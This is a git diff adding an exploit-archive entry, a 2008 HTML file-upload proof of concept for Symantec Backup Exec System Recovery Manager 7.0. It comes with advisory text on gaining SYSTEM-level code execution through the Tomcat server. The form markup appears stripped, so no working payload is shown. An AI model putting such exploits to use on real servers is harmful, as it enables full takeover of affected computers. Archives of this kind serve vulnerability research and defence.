diff --git a/platforms/windows/remote/31072.html b/platforms/windows/remote/31072.html
new file mode 100755
index 000000000..1700f0fac
--- /dev/null
+++ b/platforms/windows/remote/31072.html
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/27487/info
+
+Symantec Backup Exec System Recovery Manager is prone to a vulnerability that allows arbitrary unauthorized files to be uploaded to any location on the affected server.
+
+This issue resides in the Symantec LiveState Apache Tomcat server. Attackers can leverage it to execute arbitrary code with SYSTEM-level privileges and completely compromise affected computers.
+
+
+
+ File Upload POC
+
+
Backup Exec System Recovery Manager 7.0 File Upload POC
+
+(c)BastardLabs 2008.
+
+
\ No newline at end of file
